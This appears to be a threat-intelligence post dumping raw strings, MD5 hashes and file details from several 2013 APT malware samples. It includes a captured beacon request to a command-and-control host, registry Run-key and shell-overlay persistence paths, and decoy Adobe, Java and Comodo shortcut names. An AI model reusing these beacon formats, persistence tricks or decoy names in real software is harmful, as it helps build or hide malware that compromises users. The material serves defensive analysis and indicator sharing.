GetDiskFreeSpaceExA
GetPrivateProfileSectionNamesA
LocalFree
ReadFile
OpenProcess
Process32Next
Process32First
GetStartupInfoA
run error
My WorkSpace %d
m4qtrsz5bfn3o1g
1.1.4
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
.?AVtype_info@@
041b1|1
5J5{5
5c6u6
6F7a7
7;8N8W8`8v8
9H9Z9
9(:b:x:
=,=E=\=
>#?R?c?
516A6S6c6s6}6
6"7(7D9{9
:f;.<
1M2b2l2}2
4"4`4
575D5Z5
586l7x7
:.:;:d:q:
;#;5;?;
<K<`<
< =F=p=
>6?U?
40e1
2%2<2
3:6L6
:T;k;
;5<M<V=#>F>w>
?/?M?V?
0S0b0
2F3q3w3&4T4e4t4z4
5#5`5t5@6^6}6
6Z7o7
858<8I8W8^8
:;:d:
#0*0/0`0
1W1v1
2\2`2d2h2l2p2t2x2|2
3(3>3E3R3Z3~3
4-4\4a4i4
5.5K5
5;6]6
7,7R7
728r8}8
:2:N:}:
:0;D;T;d;t;
=.=;=H=U=b=o=|=
=>>j>
>:?I?X?
0'0C0_0{0
1<1I1V1
2"3/3R3_3
4B4O4r4
525?5b5o5
6,6L6Y6q6~6
9%9*9/999>9C9M9R9`9e9j9t9y9~9
:(:-:2:<:A:F:P:U:Z:d:i:n:x:}:
;#;(;-;7;<;A;K;P;U;_;d;i;s;x;
<#<-<F<m<s<y<
=">Q>
?@?m?z?
0N0u0
14191C1K1R1v1
192M2[2m2w2
3-3T3h3r3
4#4*454<4G4N4Y4`4k4r4|4
5"5-545?5F5Q5X5c5j5u5|5
8H8W8
<(=,=0=4=8=<=@=D=H=L=P=T=X=\=
v0I1m1
2e4q4
3u5z5f<%?
7]8l8
:#:l:
;!;3;9;
<<=q=
R0b0h0
0R1Z1`1k1x1
3&3-383?3J3Q3\3c3n3u3
5(5-5
6&656<6G6N6X6g6n6y6
7&7L7e7k7
8*8J8h8u8{8
1P2\2h2t2
2T?X?
0(0D0L0T0\0d0
1 1<1D1P1l1t1
2(2D2L2X2t2
3$303L3X3t3
4$4(4,40444D4H4L4P4T4d4h4l4p4t4
5 5$5(5,50545<5@5H5L5P5T5X5`5d5h5l5p5t5x5|5
9X:\:p:t:
=0=4=8=<=@=D=H=L=P=T=X=\=`=d=l=p=x=|=
Storm ddos Server
Welcome to use storm ddos
Thank you
asdfgh
CreateMutexA
SetFileAttributesA
Process32First
Process32Next
CreateProcessA
WuSh B- Is Running!
CreateThread
GetEnvironmentVariableA
 /c
del "

Unicode Strings:
---------------------------------------------------------------------------
jjjjjjj
jjjjjj
jjjjj
jjjjjj
jjjj
jjjj
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
FileDescription
Device Protect Application
FileVersion
3, 9, 0, 0
InternalName
Microsoft(R) Windows(R) Operating System
LegalCopyright
Copyright ? 2013
LegalTrademarks
OriginalFilename
OriginalFileqqqq
csdf.dll
PrivateBuild
ProductName
ProductVersion
3, 9, 0, 0
SpecialBuild
VarFileInfo
Translation

Mongall strings - APT

September 3, 2013, 5:00 pm
$
0
0
File: DW20.exe
MD5:  d7dd5cda909190c6c03db5e7f8afd721
Size: 24576


GET /3000FC08000024FE0700363635353544304331303530313136300052656D6F746520504300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070161646D696E000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ndbssh.com:5331
Cache-Control: no-cache:





Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich)
.text
`.rdata
@.data
Shared
T$@h
PWVS
_^]3
=TH@
SUV3
WSSSSh
SSPU
_^]3
L<$G
D$$j:P
_^][
_^]3
SUVW
_^][
_^][
t$pV
PjIj
D$ d
QjJj
It$RU
hlA@
L$$PQj
D$ P
u$hTA@
_^]3
=$0@
D$DP
D$(?
D$$$
SPSSh
T$pj
T$lQR
_^][
_^][
_^][
_^][
_^][
=tH@
hpH@
htH@
 SVW
5\H@
%x0@
CopyFileA
GetSystemDirectoryA
GetModuleFileNameA
LoadLibraryA
Sleep
CloseHandle
SetEvent
OpenEventA
WaitForSingleObject
GetProcAddress
FreeLibrary
CreateEventA
ExitProcess
GetVolumeInformationA
GetComputerNameA
GlobalMemoryStatus
GetSystemInfo
GetVersionExA
GetVersion
KERNEL32.dll
USER32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
ADVAPI32.dll
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
InternetSetOptionA
WININET.dll
??3@YAXPAX@Z
??2@YAPAXI@Z
strchr
atoi
malloc
printf
sprintf
_beginthreadex
free
strrchr
__dllonexit
_onexit
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
AVICAP32.dll
www.ndbssh.com
\netbridge.exe
msnetshare
%systemroot%\netbridge.exe
Software\Microsoft\Windows\CurrentVersion\Run
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
update exe file false
http://%s:%d/%d%s
ProcessTrans
~MHz
Hardware\Description\System\CentralProcessor\0
%08x
%s%s

Unicode Strings:
---------------------------------------------------------------------------
jjjj

Taidoor strings - APT

September 3, 2013, 5:39 pm
$
0
0
File: DW20.exe
MD5:  46ef9b0f1419e26f2f37d9d3495c499f
Size: 47104

Ascii Strings:




---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
ARich
.text
`.rdata
@.data
.rsrc
_^][
QSUWh
D$ C;
^_][Y
l$@VWPQU
_^][
_^][
h P@
_^][
_^][
_^][
_^][
_^][
SUVW
-d@@
><\u
D$ s
D$!t
--------------snip
_^][
WPRU
_^]3
_^]3
%|@@
h@A@
hSVW
>"u:F
XPVSS
MFC42.DLL
printf
fclose
fopen
fwrite
rand
__p___argv
__p___argc
__CxxFrameHandler
_CxxThrowException
putc
getc
fread
realloc
__dllonexit
_onexit
MSVCRT.dll
??1type_info@@UAE@XZ
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
OutputDebugStringA
LockResource
GetProcAddress
GetModuleHandleA
SizeofResource
FindResourceA
lstrcpyA
lstrlenA
lstrcatA
CloseHandle
CreateProcessA
GetTickCount
CopyFileA
lstrcmpiA
GetLongPathNameA
ExpandEnvironmentStringsA
GetModuleFileNameA
DeleteFileA
Sleep
VirtualAlloc
VirtualProtect
VirtualFree
IsBadReadPtr
HeapAlloc
GetProcessHeap
GetStartupInfoA
KERNEL32.dll
wsprintfA
USER32.dll
CloseServiceHandle
EnumServicesStatusA
OpenSCManagerA
ADVAPI32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
StrChrA
PathRemoveFileSpecA
SHLWAPI.dll
_stricmp
Kernel32.dll
Start
IDR_BIN
%tmp%\
.exe
%tmp%
WinHttp
Read Error
.?AVtype_info@@
1PAD(
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

Unicode Strings:
---------------------------------------------------------------------------
IDR_BIN
"-7v
------------------snip
h&About ...
About
System
Bypass Version 1.0
Copyright (C) 2013
Bypass
Hello World!
BYPASS

Surtr (Smoaler) strings - APT

September 3, 2013, 5:42 pm
$
0
0
File: DW20.dll
MD5:  8e187ae152c48099f715af442339c340
Size: 44032






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.reloc
;ORD.
MessageBoxA
user32.dll
CloseHandle
CreateFileA
GetFileSize
GetModuleFileNameA
GetTempFileNameA
GetTempPathA
ReadFile
SetFilePointer
VirtualAlloc
WinExec
WriteFile
lstrlenA
kernel32.dll
mydll.dll
DoWork
0#010I0j0y0
1%1+171=1C1I1T1_1k1
!This program cannot be run in DOS mode.
Richw
.text
`.rdata
@.data
.rsrc
SVW3
)MYi62
HX-1
-'pY
l|A@
8HTd
&5I8
d)9&
Od-@q
Soft
ware
\Mic
roso
ft\W
indo
ws M
edia
t$ ;4
_^]3
Pj@h
h40@
h$0@
Dah$0@
h$0@
h$0@
h$0@
h$0@
Oh$0@
7tah@0@
hD0@
Pj@QV
5L1@
t"It
Iu'j
hh @
hSVW
>"u:F
XPVSS
%( @
%8 @
%P @
%T @
VirtualProtect
KERNEL32.dll
strncpy
fclose
fread
ftell
fseek
fopen
fwrite
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
advapi32.dll
kernel32.dll
ntdll.dll
h6WW
>t:$
ut@$p(
(uPV
D1$c
U?(p
hvg
^w$L
UO$EdP
u7$d
Q]y(
YQA+;h
zu+$
stf(W
wwwwwwwwwwwwww
wwwwwwwwwwwwww
DDDDDDDDD@
DDDDDDDDDGpw
DDDDDDDDDGpw
DDDDDDDDDDDDDD
wwwwwwwwwwwwww
This
proggam
DO~S
mode.
iS0R
chDH(
P@EL8
rdatP
.'(Le)
P`relo
5lp(L
t9"I
\$l;
Q8RP
()jT@+h
FV2PSR
VUoW%
`!3\
C@go6;
QVhU<
AsAnG#
-140p
F<iECE
QQ1P5^
xtcR
B8*Xs,
9MZu}:
vd'Q
v=bO
PL&CT$
QHxp
 {I;P
+Q$@
$tF#
 FYE
H.Pt
JPXQU
65h!
ZSWV
yUq3
K/2g
"j@A
15*W Q
EPS4
r4U @x
|diLT
Q},\&
bB0d#
s)j!P
E <B)L_
&dS
e2h^
PKzt
kJd\
mWB&
T$_7
VZ2|
`JB.mX%
*9WE
T^^h
zB!d
fEqK,
16OPT"!<%
>a9H
PVQR
/2qVj(
@Q|&
tNv^
8,Du
QSeW
&6Ad
v*:(A
j(@!
fqhx
t!hy
Au)I
Z_L[
'*jU
'Lw!
h8B#|
"GDt
)TSh
fp!8=
tU8<A
TpT!
'2x%P
WuST
K:jrg
jd,H
$Whq
UNH e %
szJlJ E
?uI3$
JR"[!jc
"-$j
LJO_"
qCZ@
C! y
(=KP
/Wfx
D?0h
fgXD1`X
-@b$
B,"~
B4#O
z{2%18
<"#0
dDAb
LG@X
bx10X
?B!|
B0!$
o{)-o<Q
Fxw@
["_,eRVUe
tB*d
n6.O
_[mz
cDPp
U~PN
4WP}
$h)g?
 &E4+
{-Yo
zb8H
!8!X
ASk)
Xo!m
J"8M
FI!HF!
VL{ RBlf
Xkm@
Y2N^
eQg\
(OU
 ;JD
F&m,
SK<Kck
(/dU2<
W~%dNS
VQ$S9b
%+GJ(
!]_K
%#,4
*pX
q5*#
s$bP->
$+bt|
+3!8
SRR>h
WJ- -
U>Bq'
nC7@
[+VU
Y9M]
.R?[
kLvN^H
QqSkR
u.Wh
ko-A (
47tF
eCQT
(fWU(
&Rh!
A-,0
C'/4*!"
x_tT
SWQ8F!
PywN
tK9a
=JR@
EVW/
<X(F
1XRP
t/WS+
jEL#
G0#(
-_tf
tM%VP
-b'Q^
1YK.
Df!gI
(ch-
l<#uZ?$U
0V8Y
17WP(
<DL)
"):DBJ
xP?1
X (
6(8Cr
ginthr
}3v*
2@Y9AP
FraDH
ndvl
SVCRT.d
USER3R2^8
a5ACP
r(tu
vPgo
bNjL4
icm>
Q(&QI
8ed8
u`@$p(_
U?(p
hvg
UO$EdP
a<ppA
u7$vd
Q]y(
<JQL
8^8X8?Q
u+;$
(m3C
stf(W
Y3p8
Ke9rn
Aibr
%s #
SoftwZ
e\Mico
Cur0
0E=xp|
X),U
9cS=C{<vd
CxrPR
 aCvVp
rqwf
n:(z
TA~~i
4 HdCvxt
/v-Y
_CUR
U7\(
=sSA
H5S"
tg$m
Zb)D
3Lkn~)
Q:|(yV
4h&d@
/=B&cS
orTB44i
ToM$ul
!3tPkc
FHilXUu
(x86)\I
SysWO
s0thm
\1Li
2$BaxnD
1232.
VP|N]LMyc0
$XC.+
PADCINGX
&3r-tEvLx
 ;r&tGvdx
=1'BGQg`
{95o:v
75NB
:r,tSv
v!x1zH|N~Y~e~u~
71f'{G
3rJtyv
6r7tVv
v"x3
L+OxzA|F~W~\~m~r~
=#>0?7?<?H?M?R?^?c?h?t?y?~?
,O8>
"910:9}
92E:
3BNR
#5r*t9vXxzz
tBvLxfzx|
Pt\v
4P B
> ?$*(
~0~4~8~<~@~DX
t)v6xOz_|
T1mN
L7VN
9i9;
T=zN
4!5T
)%:1
qv4,
x0|'
,4!<=D*L
~t~|M
freL19
jkub
!Wv8
lu~(
wwwwwwwwwwwwww
wwwwwwwwwwwwww
DDDDDDDDD@
DDDDDDDDDGpw
DDDDDDDDDGpw
DDDDDDDDDDDDDD
wwwwwwwwwwwwww

Unicode Strings:
---------------------------------------------------------------------------
Ef77

TBD 8202 strings - APT

September 3, 2013, 5:48 pm
$
0
0
File: DW20.dll
MD5:
064ae9b451f0503982842c9f41a58053
Size: 60416

Ascii Strings:




---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.reloc
;ORD.
MessageBoxA
user32.dll
CloseHandle
CreateFileA
GetFileSize
GetModuleFileNameA
GetTempFileNameA
GetTempPathA
ReadFile
SetFilePointer
VirtualAlloc
WinExec
WriteFile
lstrlenA
kernel32.dll
mydll.dll
DoWork
0#010I0j0y0
1%1+171=1C1I1T1_1k1
!This program cannot be run in DOS mode.
Rich?
.text
`.rdata
@.data
GJMTWZ48
This progr
m cannot b
 run in DO
 mode.
xRich&
.twxt
`.rdata
.data
L$$Pj
L$8Pj
:T$
D$8g
Z|$!
L$$Q
D$ RP
T$ QR
_^]2
Phs|
VhHp
_^]2
j&PR
PRh`p
j#Pj
Phiw
T$(C
VW"`p
VWh|w
VWhpw
_^][u
\SVW
S~W3
t$S]
QSh?
SSSVh
uXVh
t ;=
ySVW3
D$bQP
Ph,x
VWPh?
T$cQ
j#Pj
T$xj
D$8h
D$pj
T$tR
T$@Q
T$tRhpy
?u~hdy
_^][
SUVW
L$xj#QSr
D$tS
T$t/
L$tSQ
Qh z
T$tRW
R40z
uj86$
L$DP
T$th
t^Vh
_^][
j#Rj
L$,h
D$@h
uA_2
WWWV
WPUSV
j#Pj
UD~D$8h
L$@h
ND$8
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
_^[9
Rj@SV
Qj@SVe
#PPV
~D/
t$$5
D$l|
_^]3
e^][
tISU
_^]3
_^]|
ti_^3
^3|[Y
_]^[Y
vVS3
D$ P
D$fP
L$9f
H8IH
|$0h(|
D$8QR
D$8QRP
D$8QRP
iSh8
|$8B
uuSSh8
u?h<
NWVS
u&WVS
_^[]
lstrcpyA
CancelI`
GetFilaAttributes
lstrca
lstrc
lstr
ualProtect
DeleteF
Free
ibrary
oseHandle
WaitForSi
gleObject
Sleep
tSystemDir
ctoryA
G:tModuleFil1NameA
F ndClose
metFileAttrZbutesA
nindNextFilxA
FindFi`stFileA
ReadFile
SetFilePo
nter
FileSize
CreateFile
WideCha
ToMultiByt
CopyFil
GetLas
Error
rtualFree
ERNEL32.dl
wsprin
USER32.
RegC
oseKey
R2gQueryValu)ExA
penKeyExA
RegSetVal^eExA
ReGCreateKeyEmA
ADVAPI32$dll
tSpecialFo
derPathA
ELL32.dll
S2_32.dll
??3@YAXP
fwri
fseek
fopen
?2@YAPAXI@
fprint
fread
ysprintf
ept_handle(3
strrc'r
__p__p#mptr
strJtr
renaCe
rand
srand
lime
__CuxFrameHandner
free
malloc
_beginthr
adex
move
MSVCR
.dll
itterm
djust_fdiv
StrStrI
SHLWAPI.
_file
ength
leno
uerverDll.dwl
sGorking
stbynam
nect
2.dll
getho
window
\syswow64
ShE11C0D
Softwar
\Google
11C0DESize
CcocCcrc
cactcecIcn
sctcacnccc
CeoeI2neieteieae eiezeea
otltet3t2t
tdtltlt
CHocUcncicncIctcicaclcivzcec
RcocgcScectcV
aclcucecEc
geOapbecne
deeyxEexxA
Afdfvfaf
fif3f2f.fd
lflf
dgeCflgohs
ekKledyc
chceclclcE
xcecccuctc
Schfe
lcla3e2q.d
clalg
SdHeGfefteSapc?xcdidadldF+odldddedrd
dadtdhdAd
LvovavdvIvMvovnvAv
SPesnsdsMsesksssasgsesA~
FfifnfffWfifnfdfo
wfEfxfAf
trtatntstl
atttetMtet
tstatgtet
Ddidsdpd
dtdcdhdMde
sdsdadgded
Gdedt
Mdedsdsdad
dedAd
oowoWoiono
ooowo
rbebabtbeb?bibnbdbobw?EbxbAb
Rr7rgrirsrtre5rrCrlrarsrOrErxrAr
GeeeteIeneVeueteSetea~teee
LlolqldlClulrlsiolrlAl
ssstsQsusi
tsMsesssss
sgses
efrf3f2f.f
flflf
ousutuTuhu
ueuauduMue
susuaugueu
nctad
ldla.eddla
ZawdQcu
eerrytSdyg
stdeemgIdn
froargmeaa
citodnx
GcectcScyc9ctcecmcDci\rceccctcocFcycAc
TbeKrbmbibnbabjbebPbrbobcqebsbsb
OvevtvCvuvr
rvevnvtvPv
vovcvevsvs
Ivdv
Cdrd
dadtdedPdr
odcdedsdsd
Vdidr
tdudadldFd
dededEdxd
OgpheensPa
cogchejsks
Vaigrcte
aagleAglhl
orcaEcxx
Wgreiatge
Pxrgoecseg+hseMsecmeo)rryg
Cc0henaateegR_edmeoxtgehxahgreesaddB
Gceate@xegresgihonnxEhxeAx
k0e0rxndefl
3a2g.cdale
Etxhi
taPgrhojcr
ascsa
acdcLcicbc
cacrcycWc
Lcocacdc
cicbcrcacr
ycAc
dtdMdodddu
ldedHdadnd
dldedAd
GgegtgPgrg
gcgAgdgdgr<egsgsg
aualataiaB$yataeaTaoamaiadaeaCahNaara
CmomTmymFmimlmetAm
CirieioitieiDiiirjeicitioiri
thThehmhph
hahthhhAh
GqeqtqFq
qlqeqAqtqt
rqiqbquqtq
qsqAq
eytyCyuyry
yeynytyTyh
ryeyaydyIy
Cwrwe
awtwewMwuwtwewxwAw
SbebtbFbib2bebAbtbtbr1ibbbubtbeb;bAb
VdiYrdtdudadldsdldldodcd
VcicrctcicaclcPcrcortceccctc
Raedmdodv
edDdidrded
dtdodrdydA
k0e0rx
deflg3a2g.
dflflf
aebtcMdoad
ualfeaFdia
feaNfaamfe
info
8202u39232B.log
%s\8^02u39232e.
%s\820du39232s.db
%s\8202us9232d.log
%sSize
KernelBaszGetGlobalDuta
Kernel32
%s%s
AutoE
dTasks
ontrol Pan
l\Desktop
Start
Soft
are\Micros
ft\Windows&CurrentVer
ion\Explor
r\User She5l Folders
%s%s%s
FTWARE\ClaKses\CLSID\
\InprocSerTer32
SOFTWVRE\Microsojt\Windows\BurrentVers
on\Explore
\ShellIcon
verlayIden
ifiers\360
DiskGuard
con Overla
rundll
FileBufSiz
%s\Adobe
lash Updat
d { %d}.ln
%s\Ado
e_FlashUpd
te.lnk
ava Sun
%s\Adobe_F*ashUpdate @ %d}.lnk
cunJavaErrrJr.log sI
Adobe_Fla|hUpdate.lno
\rundll
2.exe
%s\error.
%s\S
nJavaErrro
.log
\Jre
\Java
Sun Orcal
dll.log
rd.dll
\*.*
%s\Como
o Updated.
%sABC
comodo.l;g
%s.log
%s\360UdisUGuard.dll
rundll32
"%sAf.log"
\helpbr
\Javame
1827-EFAf-
FJALS_1343
.tmp
\Secu
ityLog.log
\Securi
yLog
sWork
%s\u
erinit.exe
taskhost.e
explo
er.exe
serinit.ex
Functi
nWork
%$\updateerr#r_2tmp.log
%s\updateeDror_2.log
\Sun OrcAl\Java\Jre
91827-EFAf'AFJALS_134
ws2_32.d
%u.%u.%
infoSi
020~0
:1d1i1
1*2_2w2
484^4
5*515=5l5
6i6s6}
17J7Q7v7
7Y8}8
;3;G;[;o;%;
<,<A<K<P<g
n<|<
<!=&=3=G=B=V=[=`=j=o>t=~=
>!>&>
>5>:>?>I>N
S>]>b>g>q>
?+?0@5???D?I?S?,?]?g?l?q?{V
0#0(0207
<0F0K0P0Z0C0d0q0v0{0
1(1F1K1
494a4g4m4
,5<5z5
6 6)
8$8t8
9$9/XX9y9
:.:U:`q
;0;f;
=&=.=c=
=*>9>@>t>g>x>
?E?N?f?{?
P0U0}0
>1w1
1?2h2{
3(3/3/46
<4H4Z4r4w4"4
5257
5g6"6W6\6
707:7\7c7
8^8v8
9*9C9c9h9G9
:$:X:s:
:(,0;O;V;e;};
<$=0<7<P<
=_=x
>5>r>
>+?0
e?j?
<0C0
1.1<1N1t1
1$272K
3Q3X3]3c3qNw3|3
3%4*4d4pS
5<5L5Sd
'6,6:6^6n6
6#7*7;7
8]8t8
=[2z=
0\0c0
70787>7I7V
^7l7q7v7{7D7
7T8p8
@1P1`1p1
SUVW
v:SV
^[_]
UVWS3
_^]3
_^][
D/D*
[zFF
Z.DJ
SUVW
j#Pj
Pj@USV
UQSV
RUSV
_^][
SUVW3
L$(Sj
L$4SS
j#PS
D$$P
T$(h
L$(h
T$$j
_^]3
PQSSh
v&SV
$_[^
hSVW
>"u:F
XPVSS
Sleep
GetFileAttributesA
GetModuleFileNameA
GetCurrentProcess
VirtualProtect
GlobalFree
ReadFile
GlobalAlloc
CloseHandle
GetFileSize
CreateFileA
lstrlenA
DeleteFileA
IsDebuggerPresent
WriteProcessMemory
VirtualProtectEx
ExitProcess
ContinueDebugEvent
WaitForDebugEvent
CreateProcessA
KERNEL32.dll
SendMessageA
FindWindowExA
MessageBoxA
USER32.dll
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
_beginthreadex
??2@YAPAXI@Z
fclose
fwrite
fopen
??3@YAXPAX@Z
sprintf
atoi
fread
_except_handler3
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
GetStartupInfoA
_filelength
_fileno
Bin.exe
TlsMain
0x0056E345
23.d
Warning
ocessA
Creat
32.dll
Process
inate
Term
%s\8202u3923pi.db
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%s\len.txt
%s\start.txt
JMPTZ48b
%s "%s\8202u39232d.log" InF
ll32.exe
rund

Unicode Strings:
---------------------------------------------------------------------------
aKernelBas
.dll
@jjj
jjjj



=================================================
File: SunJavaErrror.log / 8202u39232d.log
MD5:  ba1e3b06c990e0c90e3a52ac7b4a42d4
Size: 36864

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
xRich&
.text
`.rdata
@.data
.reloc
L$$Pj
L$8Pj
L$$Q
D$ RP
T$ QR
_^]2
PhH|
VhHp
_^]2
j&PR
Pj@h
PRh`p
SUVW
j#Pj
VWh`p
VWh|w
VWhpw
_^][u
\SVW3
SVW3
QSh?
SSSVh
uXVh
t @=
$SVW3
Ph,x
Phlx
VWPh?
SUVW
j#Pj
T$xj
D$8h
D$pj
T$tRh
L$pj
T$@Q
T$tRhpy
u~hdy
_^][
SUVW
T$ h
Sj#PS
L$xj#QS
D$tS
L$tSQ
Qh z
T$tRW
Rh0z
L$Lh
uj8\$
L$DP
T$thxx
L$DP
t^Vh
D$DR
_^][
j#Rj
L$,h
D$@h
WWWV
WPUSV
j#Pj
L$0PQ
D$8h
L$@h
T$Hh
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
Rj@SV
Qj@SV
u#PPV
_^]3
_^][
tISU
][_^
_^]3
8MZt
@TWUP
_]^[Y
vAS3
D$ P
D$ P
|$0h(|
D$<RP
D$8QRP
D$8QRP
D$8QRP
SSh8
uuSSh8
VHu/
NWVS
u7WPS
u&WVS
_^[]
lstrcpyA
CancelIo
GetFileAttributesA
lstrcatA
lstrcpynA
lstrlenA
VirtualProtect
DeleteFileA
FreeLibrary
CloseHandle
WaitForSingleObject
Sleep
GetSystemDirectoryA
GetModuleFileNameA
FindClose
SetFileAttributesA
FindNextFileA
FindFirstFileA
ReadFile
SetFilePointer
GetFileSize
CreateFileA
WideCharToMultiByte
CopyFileA
GetLastError
VirtualFree
KERNEL32.dll
wsprintfA
USER32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegCreateKeyExA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
WS2_32.dll
??3@YAXPAX@Z
fclose
fwrite
fseek
fopen
??2@YAPAXI@Z
fprintf
fread
sprintf
atoi
_except_handler3
strrchr
__p__pgmptr
strstr
rename
rand
srand
time
__CxxFrameHandler
free
malloc
_beginthreadex
memmove
MSVCRT.dll
_initterm
_adjust_fdiv
StrStrIA
SHLWAPI.dll
_filelength
_fileno
ServerDll.dll
sWorking
stbyname
nect
_32.dll
getho
windows\syswow64
ShE11C0DE
Software\Google
ShE11C0DESize
CcocCcrcecactcecIcncsctcacncccec
CeoeIeneieteieaeleiezeea
otltet3t2t.tdtltlt
CcocUcncicncictcicaclciczcec
RcecgcScectcVcaclcucecEcxcAc
RdefgeOapbecneKdeeyxEexxAa
Afdfvfafpfif3f2f.fdflflf
RaedgeCflgohsjekKledyc
SchceclclcEcxcecccuctcecAc
Schfeglcla3e2q.ddclalg
SdHeGfefteSapcexcdidadldFdodldddedrdPdadtdhdAd
LvovavdvIvcvovnvAv
SsesnsdsMsesssssasgsesAs
FfifnfdfWfifnfdfofwfEfxfAf
TtrtatntstltatttetMtetststatgtet
DdidsdpdadtdcdhdMdedsdsdadgdedAd
GdedtdMdedsdsdadgdedAd
SohooowoWoionodooowo
CbrbebabtbebWbibnbdbobwbEbxbAb
RrergrirsrtrerrrCrlrarsrsrErxrAr
GeeeteIenepeueteSeteaeteee
LlolaldlClulrlslolrlAl
PsossstsQsusistsMsesssssasgses
ufsfefrf3f2f.fdflflf
PuousutuTuhurueuauduMueususuaugueuAu
nctadbldla.eddlalg
ZawdQcuqeerrytSdygsstdeemgIdnxfroargmeaatcitodnx
GcectcScycsctcecmcDcicrceccctcocrcycAc
TbebrbmbibnbabtbebPbrbobcbebsbsb
GvevtvCvuvrvrvevnvtvPvrvovcvevsvsvIvdv
CdrdedadtdedPdrdodcdedsdsdAd
VdidrdtdudadldFdrdededEdxd
OgpheensParcogchejskse
VaigrcteuaagleAglhljorcaEcxx
WgreiatgeePxrgoecsegshseMsecmeodrryg
CcrhenaateegRhedmeoxtgehTahgreesaddc
GceateVxegresgihoenxEhxeAx
k0e0rxndeflg3a2g.cdalelg
EtxhictaPgrhojcreascsa
LcocacdcLcicbcrcacrcycWc
LcocacdcLcicbcrcacrcycAc
GdedtdMdodddudldedHdadndddldedAd
GgegtgPgrgogcgAgdgdgrgegsgsg
MaualataiaBayataeaTaoaWaiadaeaCahaaara
CmompmymFmimlmemAm
CirieiaitieiDiiirieicitioiriyiAi
GhehthThehmhphPhahthhhAh
GqeqtqFqiqlqeqAqtqtqrqiqbquqtqeqsqAq
GyeytyCyuyryryeynytyTyhyryeyaydyIydy
CwrwewawtwewMwuwtwewxwAw
SbebtbFbiblbebAbtbtbrbibbbubtbebsbAb
VdidrdtdudadldAdldldodcd
VcicrctcucaclcPcrcoctceccctc
RaedmdodvdedDdidrdedcdtdodrdydAd
k0e0rxndeflg3a2g.fdflflf
GaebtcMdoadfualfeaFdialfeaNfaamfeaAa
info
FileBuf
%s\8202u392325.log
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%sSize
KernelBaseGetGlobalData
Kernel32.dll
%s%s
%s\%s
AutoEndTasks
Control Panel\Desktop
Startup
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
%s%s%s
SOFTWARE\Classes\CLSID\
\InprocServer32
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\360UDiskGuard Icon Overlay
rundll
FileBufSize
%s\Adobe Flash Updated { %d}.lnk
%s\Adobe_FlashUpdate.lnk
Java Sun
%s\Adobe_FlashUpdate { %d}.lnk
SunJavaErrror.log sI
Adobe_FlashUpdate.lnk
\rundll32.exe
%s\error.log
%s\SunJavaErrror.log
\DATAS
\Jre
\Java
\Sun Orcal
dll.log
Guard.dll
\*.*
%s\Comodo Updated.lnk
%sABC
comodo.log
%s.log
%s\360UdiskGuard.dll
rundll32.exe
"%s\f.log"
\helper
\Javame
91827-EFAf-AFJALS_13432.tmp
\SecurityLog.log
\SecurityLog
Guard
sWorking
%s\userinit.exe
taskhost.exe
explorer.exe
